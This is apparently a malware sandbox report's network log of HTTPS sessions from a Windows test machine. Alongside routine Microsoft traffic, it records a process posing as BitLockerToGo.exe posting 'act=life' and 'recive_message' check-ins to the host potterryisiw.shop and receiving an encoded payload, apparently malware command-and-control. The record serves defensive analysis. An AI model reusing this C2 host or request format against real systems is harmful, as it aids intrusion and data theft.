                            2024-07-08 08:09:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                            2024-07-08 08:09:28 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.1249733184.28.90.27443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:31 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
                            2024-07-08 08:09:31 UTC467INHTTP/1.1 200 OK
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            Content-Type: application/octet-stream
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            Server: ECAcc (lpl/EF06)
                            X-CID: 11
                            X-Ms-ApiVersion: Distribute 1.2
                            X-Ms-Region: prod-neu-z1
                            Cache-Control: public, max-age=201648
                            Date: Mon, 08 Jul 2024 08:09:31 GMT
                            Connection: close
                            X-CID: 2


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.1249734184.28.90.27443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:32 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                            Range: bytes=0-2147483646
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
                            2024-07-08 08:09:32 UTC515INHTTP/1.1 200 OK
                            ApiVersion: Distribute 1.1
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            Content-Type: application/octet-stream
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            Server: ECAcc (lpl/EF06)
                            X-CID: 11
                            X-Ms-ApiVersion: Distribute 1.2
                            X-Ms-Region: prod-weu-z1
                            Cache-Control: public, max-age=201580
                            Date: Mon, 08 Jul 2024 08:09:32 GMT
                            Content-Length: 55
                            Connection: close
                            X-CID: 2
                            2024-07-08 08:09:32 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                            Session IDSource IPSource PortDestination IPDestination Port
                            10192.168.2.124973540.113.103.199443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:45 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 69 69 45 6c 53 4f 31 2b 48 55 75 64 51 4a 46 62 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 38 66 66 33 36 31 34 34 38 33 33 66 30 36 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: iiElSO1+HUudQJFb.1Context: 198ff36144833f06
                            2024-07-08 08:09:45 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-08 08:09:45 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 69 69 45 6c 53 4f 31 2b 48 55 75 64 51 4a 46 62 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 38 66 66 33 36 31 34 34 38 33 33 66 30 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 53 54 48 6b 76 4f 78 66 46 71 49 32 55 72 6f 50 5a 68 65 77 65 55 46 53 6e 46 46 57 6b 46 35 74 43 7a 34 55 62 68 59 42 75 31 64 62 57 64 48 67 69 66 7a 72 44 51 43 57 46 6c 59 45 51 6b 36 4b 65 56 76 52 73 31 77 2f 44 46 32 4b 55 34 4d 33 68 4e 50 39 41 38 6e 39 74 65 73 66 6c 76 4e 76 4e 2f 41 6a 38 35 35 69 44 57 70 61
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: iiElSO1+HUudQJFb.2Context: 198ff36144833f06<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAVSTHkvOxfFqI2UroPZheweUFSnFFWkF5tCz4UbhYBu1dbWdHgifzrDQCWFlYEQk6KeVvRs1w/DF2KU4M3hNP9A8n9tesflvNvN/Aj855iDWpa
                            2024-07-08 08:09:45 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 69 69 45 6c 53 4f 31 2b 48 55 75 64 51 4a 46 62 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 39 38 66 66 33 36 31 34 34 38 33 33 66 30 36 0d 0a 0d 0a
                            Data Ascii: BND 3 CON\QOS 56MS-CV: iiElSO1+HUudQJFb.3Context: 198ff36144833f06
                            2024-07-08 08:09:46 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-08 08:09:46 UTC58INData Raw: 4d 53 2d 43 56 3a 20 62 78 59 6c 66 36 2f 64 39 45 71 35 63 74 6a 52 36 4e 59 71 57 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: bxYlf6/d9Eq5ctjR6NYqWA.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.1249736188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:49 UTC264OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: potterryisiw.shop
                            2024-07-08 08:09:49 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                            Data Ascii: act=life
                            2024-07-08 08:09:49 UTC800INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:49 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=8qlrooehaenbe8sqtcurrb70r7; expires=Fri, 01-Nov-2024 01:56:28 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8LPrghhTeBvEfxpELxvpVsmrDoACjIddQCTowWI2pSpeJwjQeZXD7a9ofdObrkq0MXDuRcUFammGdP7RQzv8ErOcXlMtt5fLbpILMq39rRzdXFfJwFMMJT1wbWs%2Fcv2mKYDsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe9822a9405e61-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2024-07-08 08:09:49 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.1249737188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:50 UTC265OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 51
                            Host: potterryisiw.shop
                            2024-07-08 08:09:50 UTC51OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 74 69 6e 65 26 6a 3d
                            Data Ascii: act=recive_message&ver=4.0&lid=fuOLMb--palpatine&j=
                            2024-07-08 08:09:50 UTC802INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:50 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=e936edjbdhk56vr3p9t8qfpgb7; expires=Fri, 01-Nov-2024 01:56:29 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZRfTYVrvUnbdHwRRtvYxQalNGRDjuQwcff5mvR0O1RE6UhN4wZks4KXPHpxJZaaj0DG3uYxqgOleDY8PI9s0LO7jJp%2F6bYV%2B4ZNwqAbzF7yVngFMZj2LzbQvzA06RJKnN50Ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe98286cabc443-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:50 UTC567INData Raw: 32 65 31 31 0d 0a 42 31 4d 34 6d 7a 57 55 41 65 51 76 61 75 4c 6f 56 78 45 78 7a 2b 63 34 4b 32 47 6f 47 4c 41 61 53 53 72 36 52 43 47 66 61 56 6c 38 63 55 36 35 44 36 41 74 78 6c 77 50 77 4e 49 6a 59 30 53 71 79 78 70 4b 42 59 6f 69 31 6e 73 6c 57 5a 39 6f 41 2b 6b 45 65 7a 30 31 57 66 64 47 38 53 33 47 53 68 4c 41 30 67 78 71 45 36 71 4a 47 68 46 44 7a 58 4c 53 65 79 56 49 6d 79 39 4f 37 77 55 36 62 7a 39 66 38 31 44 33 5a 59 56 44 42 34 65 4e 4d 6e 42 62 6f 59 35 56 51 77 79 4b 4e 4a 4a 2f 4d 77 6a 41 5a 6d 7a 36 48 54 68 4b 4d 6b 76 77 46 2b 6b 74 6e 77 30 50 6a 4d 70 74 4d 31 43 71 68 56 52 4e 42 63 4e 77 32 48 49 74 53 5a 34 75 55 66 59 50 4d 57 38 78 58 50 4a 61 2f 6e 47 49 53 51 43 4d 69 7a 68 77 45 2b 50 46 58 56 46 44 6b 6a 71 42 53 69 68 5a 69
                            Data Ascii: 2e11B1M4mzWUAeQvauLoVxExz+c4K2GoGLAaSSr6RCGfaVl8cU65D6AtxlwPwNIjY0SqyxpKBYoi1nslWZ9oA+kEez01WfdG8S3GShLA0gxqE6qJGhFDzXLSeyVImy9O7wU6bz9f81D3ZYVDB4eNMnBboY5VQwyKNJJ/MwjAZmz6HThKMkvwF+ktnw0PjMptM1CqhVRNBcNw2HItSZ4uUfYPMW8xXPJa/nGISQCMizhwE+PFXVFDkjqBSihZi
                            2024-07-08 08:09:50 UTC1369INData Raw: 66 68 6b 6b 41 30 58 7a 70 4e 31 64 46 2f 74 33 52 70 48 42 73 56 6f 30 32 6f 75 52 6f 6f 71 52 76 73 47 4f 47 73 78 58 2f 35 61 2b 47 57 42 54 67 43 45 69 7a 74 2f 57 61 36 42 57 51 6c 4e 69 6e 33 4b 4f 48 4d 49 71 53 56 48 2b 68 6b 34 61 33 46 46 74 30 36 32 5a 49 6f 4e 55 4d 43 41 4d 33 35 61 70 6f 4a 53 52 52 48 42 64 64 46 78 4c 45 36 53 4a 55 76 33 44 54 56 6b 4e 6c 2f 2b 52 66 68 6f 69 30 34 43 68 73 70 37 4d 31 53 31 78 51 49 4a 4c 63 6c 72 78 45 6f 6f 57 59 6c 6d 58 4c 4d 53 65 32 49 39 47 71 45 58 2f 32 75 4a 51 41 57 4b 68 44 42 2b 57 71 79 45 56 30 38 49 79 33 4c 61 66 43 78 49 6e 43 74 4d 38 77 73 31 62 54 52 65 38 31 36 32 4c 63 5a 4b 45 4d 44 53 64 55 4e 65 6f 59 35 57 43 7a 62 4a 64 4e 78 2f 50 51 69 48 61 46 71 39 44 44 63 6c 61 52 72 72
                            Data Ascii: fhkkA0XzpN1dF/t3RpHBsVo02ouRooqRvsGOGsxX/5a+GWBTgCEizt/Wa6BWQlNin3KOHMIqSVH+hk4a3FFt062ZIoNUMCAM35apoJSRRHBddFxLE6SJUv3DTVkNl/+Rfhoi04Chsp7M1S1xQIJLclrxEooWYlmXLMSe2I9GqEX/2uJQAWKhDB+WqyEV08Iy3LafCxInCtM8ws1bTRe8162LcZKEMDSdUNeoY5WCzbJdNx/PQiHaFq9DDclaRrr
                            2024-07-08 08:09:50 UTC1369INData Raw: 4a 4b 43 63 44 45 64 58 52 4c 37 64 30 61 66 78 50 48 64 76 78 7a 4a 30 48 59 4f 51 33 6b 53 7a 78 70 63 51 4b 35 55 2f 70 72 6a 45 49 42 69 6f 41 36 65 6c 4f 6c 6a 46 4e 4b 41 38 5a 38 30 33 51 6e 52 5a 30 6c 52 76 41 4f 4f 32 6b 32 58 66 67 58 75 43 4f 42 56 55 6a 59 79 67 56 2b 58 36 61 4a 47 48 77 41 78 48 54 56 62 6d 74 58 31 6a 38 44 2b 67 64 37 50 58 46 56 2b 46 72 38 61 49 68 42 43 59 43 4f 4e 6e 6c 54 6f 6f 42 63 51 51 72 4b 61 4e 56 33 4b 6b 6d 54 4c 55 37 7a 44 6a 70 67 4e 68 71 33 46 2f 46 37 78 68 56 49 72 61 4d 50 4d 30 7a 6a 6e 42 70 4f 44 34 6f 69 6b 6e 77 68 53 4a 55 73 53 50 49 49 50 47 73 78 56 2f 4e 46 2f 6d 4f 47 51 77 36 42 68 6a 42 79 58 36 36 58 56 6b 38 4f 7a 48 4c 41 4f 47 55 49 6e 7a 34 44 70 55 73 62 62 6a 31 5a 39 56 62 78 49
                            Data Ascii: JKCcDEdXRL7d0afxPHdvxzJ0HYOQ3kSzxpcQK5U/prjEIBioA6elOljFNKA8Z803QnRZ0lRvAOO2k2XfgXuCOBVUjYygV+X6aJGHwAxHTVbmtX1j8D+gd7PXFV+Fr8aIhBCYCONnlTooBcQQrKaNV3KkmTLU7zDjpgNhq3F/F7xhVIraMPM0zjnBpOD4oiknwhSJUsSPIIPGsxV/NF/mOGQw6BhjByX66XVk8OzHLAOGUInz4DpUsbbj1Z9VbxI
                            2024-07-08 08:09:50 UTC1369INData Raw: 50 67 79 64 77 58 36 4f 43 56 45 55 4e 78 33 44 52 64 57 73 47 32 43 46 62 76 56 4e 37 53 54 5a 58 31 31 7a 36 5a 4d 5a 53 52 70 6e 4b 4d 6e 38 54 39 63 56 57 51 77 2f 44 65 74 74 39 49 30 4f 52 49 30 4c 32 44 6a 68 6a 50 46 58 77 52 66 78 67 69 45 34 45 6a 49 77 30 63 45 47 6c 6a 42 6f 48 51 38 31 69 6b 69 42 72 61 5a 59 72 56 2f 6f 62 65 33 70 2f 51 37 6c 51 2b 69 50 65 44 51 75 42 68 54 5a 79 58 71 75 4d 55 6b 6b 46 7a 33 58 66 64 69 78 50 6d 43 74 4e 38 67 30 7a 61 44 31 52 39 31 37 77 59 34 64 48 53 4d 37 4b 4d 6d 73 54 39 63 56 71 53 67 50 4b 59 5a 4a 6e 5a 56 48 59 49 55 2b 39 55 33 74 33 4f 31 50 35 56 50 6c 6b 67 6b 59 45 68 59 38 36 63 46 71 6f 6a 46 52 62 43 73 52 79 32 6e 63 75 51 35 67 72 53 66 45 4c 4f 43 56 2f 47 76 35 50 74 6a 76 47 66 77
                            Data Ascii: PgydwX6OCVEUNx3DRdWsG2CFbvVN7STZX11z6ZMZSRpnKMn8T9cVWQw/Dett9I0ORI0L2DjhjPFXwRfxgiE4EjIw0cEGljBoHQ81ikiBraZYrV/obe3p/Q7lQ+iPeDQuBhTZyXquMUkkFz3XfdixPmCtN8g0zaD1R917wY4dHSM7KMmsT9cVqSgPKYZJnZVHYIU+9U3t3O1P5VPlkgkYEhY86cFqojFRbCsRy2ncuQ5grSfELOCV/Gv5PtjvGfw
                            2024-07-08 08:09:50 UTC1369INData Raw: 64 56 79 6b 68 6c 6c 41 42 4d 4a 32 32 48 73 73 43 4e 5a 6d 52 4f 56 4c 59 79 55 53 54 65 6c 61 74 6e 7a 49 56 45 69 48 68 6e 55 72 45 36 57 49 55 6b 4d 48 7a 58 66 56 66 69 4a 61 6b 53 4e 4e 2f 51 38 77 61 6a 64 65 2b 6c 66 6b 5a 59 4a 46 43 34 32 48 4f 33 42 58 37 63 73 61 54 68 75 4b 49 70 4a 4b 4a 6b 61 44 4b 55 54 73 41 58 74 36 66 30 4f 35 55 50 6f 6a 33 67 30 4d 6a 70 67 2b 63 6c 69 6d 69 31 31 47 42 73 42 36 33 58 77 6f 52 70 4d 6e 51 50 55 47 4e 6d 73 37 55 2f 42 51 2b 6d 65 42 44 55 62 41 6a 53 30 7a 43 2b 32 75 65 32 51 76 7a 57 43 53 5a 32 56 52 32 43 46 50 76 56 4e 37 61 54 68 57 38 31 7a 78 61 59 68 45 42 6f 75 59 4a 33 42 58 72 6f 78 5a 54 67 72 45 65 74 56 39 4a 55 2b 5a 4c 55 66 33 43 44 30 6c 66 78 72 2b 54 37 59 37 78 6d 45 4c 67 49 63
                            Data Ascii: dVykhllABMJ22HssCNZmROVLYyUSTelatnzIVEiHhnUrE6WIUkMHzXfVfiJakSNN/Q8wajde+lfkZYJFC42HO3BX7csaThuKIpJKJkaDKUTsAXt6f0O5UPoj3g0Mjpg+climi11GBsB63XwoRpMnQPUGNms7U/BQ+meBDUbAjS0zC+2ue2QvzWCSZ2VR2CFPvVN7aThW81zxaYhEBouYJ3BXroxZTgrEetV9JU+ZLUf3CD0lfxr+T7Y7xmELgIc
                            2024-07-08 08:09:50 UTC1369INData Raw: 34 52 64 51 51 37 59 65 64 31 33 4c 30 69 58 49 45 58 38 42 44 31 69 4f 46 76 78 55 4c 59 74 78 6b 6f 51 77 4e 4a 31 58 56 53 75 67 52 70 57 54 64 4d 36 31 58 52 72 45 4e 67 6d 53 66 63 42 4e 57 55 32 53 50 39 65 39 6d 43 55 54 67 36 49 6a 44 6c 2f 58 71 57 4d 57 6b 77 49 78 33 48 66 66 69 74 44 6d 57 59 4e 76 51 77 6a 4a 57 6b 61 79 46 72 34 5a 34 68 4f 47 49 66 4b 4b 6a 31 4b 37 59 4a 57 43 56 75 4b 64 64 74 71 4c 45 32 51 4c 30 50 7a 41 6a 4a 69 4e 56 6e 34 55 2f 70 73 6a 30 34 41 67 59 49 36 63 46 4f 6d 6a 56 42 49 44 63 38 36 6e 44 67 73 55 4e 68 2b 41 39 49 49 50 6d 34 77 47 4e 35 52 38 57 2f 47 55 6b 61 5a 79 6a 4a 2f 45 2f 58 46 57 55 30 4e 77 33 58 57 63 69 78 49 6e 79 42 44 39 51 41 32 62 69 4e 66 39 31 4c 33 59 34 64 43 42 49 43 59 4d 48 31 59
                            Data Ascii: 4RdQQ7Yed13L0iXIEX8BD1iOFvxULYtxkoQwNJ1XVSugRpWTdM61XRrENgmSfcBNWU2SP9e9mCUTg6IjDl/XqWMWkwIx3HffitDmWYNvQwjJWkayFr4Z4hOGIfKKj1K7YJWCVuKddtqLE2QL0PzAjJiNVn4U/psj04AgYI6cFOmjVBIDc86nDgsUNh+A9IIPm4wGN5R8W/GUkaZyjJ/E/XFWU0Nw3XWcixInyBD9QA2biNf91L3Y4dCBICYMH1Y
                            2024-07-08 08:09:50 UTC1369INData Raw: 63 74 7a 58 7a 58 66 7a 73 4b 74 69 31 58 2b 6b 74 31 4a 54 34 61 6f 57 36 32 4b 38 5a 79 52 73 43 53 64 53 73 54 6d 49 5a 55 52 77 54 63 61 35 39 57 4c 45 36 64 49 56 4f 2f 4a 54 42 78 4e 68 71 33 46 2f 41 6a 33 68 31 47 77 49 34 6b 4d 77 76 39 31 77 45 63 55 4a 30 71 67 47 64 6c 55 64 67 77 41 36 56 5a 64 53 55 6a 47 71 45 58 73 57 43 55 58 77 36 44 6e 44 59 30 62 5a 4f 47 54 45 51 4d 77 58 76 73 52 67 56 46 6d 53 56 4e 76 7a 6f 74 61 43 46 5a 2f 46 44 49 58 59 68 4b 48 49 65 45 4d 33 4d 54 34 38 56 56 43 56 76 7a 4f 70 6f 34 46 41 62 59 50 67 4f 6c 53 77 35 6d 50 31 54 2b 51 65 63 75 70 56 73 46 6a 34 45 30 4d 78 33 74 67 78 6f 52 55 34 51 36 31 6d 6c 72 45 4d 68 30 47 4b 68 59 62 44 56 6a 52 62 64 4f 74 6e 58 47 46 56 72 4f 79 69 63 7a 43 2b 33 43 56
                            Data Ascii: ctzXzXfzsKti1X+kt1JT4aoW62K8ZyRsCSdSsTmIZURwTca59WLE6dIVO/JTBxNhq3F/Aj3h1GwI4kMwv91wEcUJ0qgGdlUdgwA6VZdSUjGqEXsWCUXw6DnDY0bZOGTEQMwXvsRgVFmSVNvzotaCFZ/FDIXYhKHIeEM3MT48VVCVvzOpo4FAbYPgOlSw5mP1T+QecupVsFj4E0Mx3tgxoRU4Q61mlrEMh0GKhYbDVjRbdOtnXGFVrOyiczC+3CV
                            2024-07-08 08:09:50 UTC1369INData Raw: 36 69 6b 46 72 41 4e 67 5a 44 62 30 54 65 7a 31 78 62 2f 70 5a 2b 47 53 51 58 45 57 6e 68 44 4a 79 52 62 32 49 56 6d 67 41 32 33 43 53 4e 6d 74 4f 32 48 34 52 73 30 73 2f 64 48 45 43 71 51 57 74 4e 74 55 61 57 4e 4b 56 65 32 6f 54 75 38 55 43 47 30 32 4b 61 4a 49 67 61 77 2b 62 4e 46 48 37 43 43 31 6d 64 6d 54 48 63 75 46 67 6c 6b 73 4c 76 72 51 65 66 31 57 71 6e 31 31 50 4a 65 6f 36 6e 44 67 6b 43 4d 41 66 41 37 56 4c 42 43 74 78 51 72 6b 50 74 6c 61 46 51 77 61 48 6e 43 51 2b 64 72 71 47 53 6b 38 41 69 6a 53 53 66 6d 73 51 79 47 67 44 2b 52 70 37 50 57 45 49 6f 67 4b 6c 4e 4e 59 66 46 38 36 54 64 57 55 54 39 64 63 55 43 52 47 4b 49 70 49 2f 4b 46 71 4b 49 45 44 72 43 48 78 62 44 33 7a 36 52 76 78 43 69 31 30 50 76 72 51 67 63 46 32 6a 67 6b 78 59 51 34
                            Data Ascii: 6ikFrANgZDb0Tez1xb/pZ+GSQXEWnhDJyRb2IVmgA23CSNmtO2H4Rs0s/dHECqQWtNtUaWNKVe2oTu8UCG02KaJIgaw+bNFH7CC1mdmTHcuFglksLvrQef1Wqn11PJeo6nDgkCMAfA7VLBCtxQrkPtlaFQwaHnCQ+drqGSk8AijSSfmsQyGgD+Rp7PWEIogKlNNYfF86TdWUT9dcUCRGKIpI/KFqKIEDrCHxbD3z6RvxCi10PvrQgcF2jgkxYQ4
                            2024-07-08 08:09:50 UTC1369INData Raw: 44 46 71 54 4a 77 48 50 47 7a 42 78 4d 6c 76 69 46 64 5a 7a 69 31 67 5a 68 35 6f 4c 54 57 53 38 67 6b 6f 4c 4a 63 6c 73 30 54 68 6c 43 49 42 6d 47 37 30 73 4b 57 34 77 61 4f 6c 63 34 6d 43 48 56 69 69 51 68 79 42 69 56 4c 33 46 52 51 63 61 69 6d 79 53 49 48 67 47 32 44 51 44 70 55 74 38 61 7a 78 62 2b 6c 6e 31 63 5a 52 4c 43 35 61 4a 63 6b 31 74 6d 59 35 4f 53 67 33 4d 63 65 78 47 48 46 6d 66 4e 67 48 62 43 43 31 6d 63 52 53 35 54 37 59 37 78 6e 6b 44 6c 49 6b 37 64 56 6a 74 6d 68 52 51 51 39 77 36 69 69 74 6c 43 49 70 6d 47 37 31 4d 4e 57 67 77 57 66 64 55 35 48 47 41 54 68 36 44 7a 51 74 4e 66 4b 36 66 54 45 4d 4f 78 6b 54 73 54 7a 70 50 69 47 52 6c 2f 68 30 34 4a 58 38 61 34 52 65 75 49 36 6c 4f 45 70 61 41 4f 48 38 54 73 73 74 44 43 52 57 4b 49 6f 45
                            Data Ascii: DFqTJwHPGzBxMlviFdZzi1gZh5oLTWS8gkoLJcls0ThlCIBmG70sKW4waOlc4mCHViiQhyBiVL3FRQcaimySIHgG2DQDpUt8azxb+ln1cZRLC5aJck1tmY5OSg3McexGHFmfNgHbCC1mcRS5T7Y7xnkDlIk7dVjtmhRQQ9w6iitlCIpmG71MNWgwWfdU5HGATh6DzQtNfK6fTEMOxkTsTzpPiGRl/h04JX8a4ReuI6lOEpaAOH8TsstDCRWKIoE


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.1249738188.114.96.34438060C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            TimestampBytes transferredDirectionData
